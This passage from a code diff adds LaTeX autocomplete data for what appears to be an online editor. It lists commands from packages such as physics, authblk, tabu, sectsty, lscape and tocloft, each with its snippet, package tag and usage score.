0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'physics-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'physics-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'physics-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'physics-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'physics-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'physics-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'physics-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'physics-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'physics-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'physics-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'physics-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'physics-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'physics-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'physics-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'physics-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'physics-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'physics-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'physics-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'physics-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'physics-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'physics-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'physics-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'physics-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'physics-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'physics-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'physics-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'physics-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'physics-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'physics-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'physics-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'physics-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'physics-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'physics-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'physics-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'physics-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'physics-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'physics-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'physics-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'physics-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'physics-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'physics-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'physics-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'physics-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'physics-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'physics-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'physics-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'physics-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'physics-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'physics-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'physics-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'physics-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'physics-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'physics-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'physics-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'physics-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'physics-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'physics-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'physics-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'physics-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'physics-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'physics-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'physics-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'physics-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'physics-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'physics-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'physics-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'physics-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'physics-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'physics-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'physics-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'physics-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'physics-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'physics-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'physics-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'physics-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'physics-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'physics-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'physics-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'physics-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'physics-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'physics-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'physics-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'physics-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'physics-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'physics-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'physics-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'physics-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'physics-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'physics-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'physics-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'physics-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'physics-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'physics-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'physics-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'physics-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'physics-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'physics-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'physics-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'physics-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'physics-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'physics-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'physics-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'physics-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'physics-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'physics-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'physics-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'physics-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'physics-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'physics-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'physics-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'physics-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'physics-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'physics-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'physics-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'physics-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'physics-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'physics-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'physics-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'physics-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'physics-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'physics-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'physics-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'physics-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'physics-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'physics-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'physics-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'physics-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'physics-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'physics-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'physics-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'physics-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'physics-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'physics-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'physics-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'physics-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'physics-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'physics-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'physics-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'physics-cmd', + score: 0.0063276692758974925, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'physics-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'physics-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'physics-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'physics-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'physics-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'physics-cmd', + score: 0.2864294797053033, + }, + ], + authblk: [ + { + caption: '\\Authfont{}', + snippet: '\\Authfont{$1}', + meta: 'authblk-cmd', + score: 0.00019538157043798684, + }, + { + caption: '\\thanks{}', + snippet: '\\thanks{$1}', + meta: 'authblk-cmd', + score: 0.08382259880654083, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'authblk-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\rlap{}', + snippet: '\\rlap{$1}', + meta: 'authblk-cmd', + score: 0.01269300721396509, + }, + { + caption: '\\Authands{}', + snippet: '\\Authands{$1}', + meta: 'authblk-cmd', + score: 0.00043932814970131613, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'authblk-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'authblk-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\textsuperscript{}', + snippet: '\\textsuperscript{$1}', + meta: 'authblk-cmd', + score: 0.05216393882408519, + }, + { + caption: '\\Affilfont{}', + snippet: '\\Affilfont{$1}', + meta: 'authblk-cmd', + score: 0.0004505484831792931, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'authblk-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\affil[]{}', + snippet: '\\affil[$1]{$2}', + meta: 'authblk-cmd', + score: 0.014174618039587864, + }, + { + caption: '\\affil{}', + snippet: '\\affil{$1}', + meta: 'authblk-cmd', + score: 0.014174618039587864, + }, + ], + tabu: [ + { + caption: '\\extrarowheight', + snippet: '\\extrarowheight', + meta: 'tabu-cmd', + score: 0.003735645243417412, + }, + { + caption: '\\extrarowheight{}', + snippet: '\\extrarowheight{$1}', + meta: 'tabu-cmd', + score: 0.003735645243417412, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabu-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tabu-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\hfill', + snippet: '\\hfill', + meta: 'tabu-cmd', + score: 0.2058248088519886, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'tabu-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'tabu-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\tabulinesep', + snippet: '\\tabulinesep', + meta: 'tabu-cmd', + score: 0.0008256968285249214, + }, + { + caption: '\\hskip', + snippet: '\\hskip', + meta: 'tabu-cmd', + score: 0.04339822811565144, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'tabu-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabu-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'tabu-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabu-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'tabu-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tabu-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'tabu-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'tabu-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'tabu-cmd', + score: 0.413853376001159, + }, + ], + CJKutf8: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'CJKutf8-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'CJKutf8-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'CJKutf8-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'CJKutf8-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\inputencoding{}', + snippet: '\\inputencoding{$1}', + meta: 'CJKutf8-cmd', + score: 0.0002447047447770061, + }, + ], + sectsty: [ + { + caption: '\\chapterfont{}', + snippet: '\\chapterfont{$1}', + meta: 'sectsty-cmd', + score: 0.0001572081344977262, + }, + { + caption: '\\raggedright', + snippet: '\\raggedright', + meta: 'sectsty-cmd', + score: 0.05314494127699766, + }, + { + caption: '\\sectionfont{}', + snippet: '\\sectionfont{$1}', + meta: 'sectsty-cmd', + score: 0.003867941482301249, + }, + { + caption: '\\paragraph{}', + snippet: '\\paragraph{$1}', + meta: 'sectsty-cmd', + score: 0.152074250347974, + }, + { + caption: '\\allsectionsfont{}', + snippet: '\\allsectionsfont{$1}', + meta: 'sectsty-cmd', + score: 0.0011367198619746117, + }, + { + caption: '\\subsection{}', + snippet: '\\subsection{$1}', + meta: 'sectsty-cmd', + score: 1.3890912739512353, + }, + { + caption: '\\subsectionfont{}', + snippet: '\\subsectionfont{$1}', + meta: 'sectsty-cmd', + score: 0.002811633808315226, + }, + { + caption: '\\interlinepenalty', + snippet: '\\interlinepenalty', + meta: 'sectsty-cmd', + score: 0.00032069955588347133, + }, + { + caption: '\\subsubsectionfont{}', + snippet: '\\subsubsectionfont{$1}', + meta: 'sectsty-cmd', + score: 0.0011363939259266408, + }, + { + caption: '\\underline{}', + snippet: '\\underline{$1}', + meta: 'sectsty-cmd', + score: 0.14748550887002482, + }, + { + caption: '\\subsubsection{}', + snippet: '\\subsubsection{$1}', + meta: 'sectsty-cmd', + score: 0.3727781330132016, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'sectsty-cmd', + score: 3.0952612541683835, + }, + ], + lscape: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'lscape-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'lscape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'lscape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'lscape-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'lscape-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'lscape-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'lscape-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'lscape-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'lscape-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'lscape-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'lscape-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'lscape-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'lscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'lscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'lscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'lscape-cmd', + score: 0.004649150613625593, + }, + ], + hyphenat: [ + { + caption: '\\hyp{}', + snippet: '\\hyp{$1}', + meta: 'hyphenat-cmd', + score: 0.0013359874951570454, + }, + ], + tocloft: [ + { + caption: '\\cftsecleader', + snippet: '\\cftsecleader', + meta: 'tocloft-cmd', + score: 0.0011340882025681251, + }, + { + caption: '\\cftloftitlefont', + snippet: '\\cftloftitlefont', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\cftchappresnum{}', + snippet: '\\cftchappresnum{$1}', + meta: 'tocloft-cmd', + score: 2.8671864736205568e-5, + }, + { + caption: '\\cftchappresnum', + snippet: '\\cftchappresnum', + meta: 'tocloft-cmd', + score: 2.8671864736205568e-5, + }, + { + caption: '\\listoftables', + snippet: '\\listoftables', + meta: 'tocloft-cmd', + score: 0.02104656820469027, + }, + { + caption: '\\cftsecfont{}', + snippet: '\\cftsecfont{$1}', + meta: 'tocloft-cmd', + score: 5.630015640183448e-5, + }, + { + caption: '\\cftchapfont{}', + snippet: '\\cftchapfont{$1}', + meta: 'tocloft-cmd', + score: 6.253521408609416e-5, + }, + { + caption: '\\cftchapfont', + snippet: '\\cftchapfont', + meta: 'tocloft-cmd', + score: 6.253521408609416e-5, + }, + { + caption: '\\cftsubsecleader', + snippet: '\\cftsubsecleader', + meta: 'tocloft-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\cftchapleader', + snippet: '\\cftchapleader', + meta: 'tocloft-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\tocloftpagestyle{}', + snippet: '\\tocloftpagestyle{$1}', + meta: 'tocloft-cmd', + score: 8.392451158032374e-5, + }, + { + caption: '\\cfttoctitlefont', + snippet: '\\cfttoctitlefont', + meta: 'tocloft-cmd', + score: 6.877027177035383e-5, + }, + { + caption: '\\cftdot', + snippet: '\\cftdot', + meta: 'tocloft-cmd', + score: 1.6201749367686227e-5, + }, + { + caption: '\\cftsecdotsep', + snippet: '\\cftsecdotsep', + meta: 'tocloft-cmd', + score: 0.0029383990986223767, + }, + { + caption: '\\cftafterloftitle', + snippet: '\\cftafterloftitle', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\listoffigures', + snippet: '\\listoffigures', + meta: 'tocloft-cmd', + score: 0.03447318897846567, + }, + { + caption: '\\cftdotfill{}', + snippet: '\\cftdotfill{$1}', + meta: 'tocloft-cmd', + score: 0.006027562229085753, + }, + { + caption: '\\tableofcontents', + snippet: '\\tableofcontents', + meta: 'tocloft-cmd', + score: 0.13360595130994957, + }, + { + caption: '\\cftdotsep', + snippet: '\\cftdotsep', + meta: 'tocloft-cmd', + score: 0.003089163130463376, + }, + { + caption: '\\numberline{}', + snippet: '\\numberline{$1}', + meta: 'tocloft-cmd', + score: 0.007461440567272885, + }, + { + caption: '\\cftlottitlefont', + snippet: '\\cftlottitlefont', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\cftchappagefont{}', + snippet: '\\cftchappagefont{$1}', + meta: 'tocloft-cmd', + score: 5.630015640183448e-5, + }, + { + caption: '\\cftsetindents{}{}{}', + snippet: '\\cftsetindents{$1}{$2}{$3}', + meta: 'tocloft-cmd', + score: 0.00043647269161217853, + }, + { + caption: '\\cftsecpagefont{}', + snippet: '\\cftsecpagefont{$1}', + meta: 'tocloft-cmd', + score: 5.630015640183448e-5, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'tocloft-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\cftaftertoctitle', + snippet: '\\cftaftertoctitle', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\cftafterlottitle', + snippet: 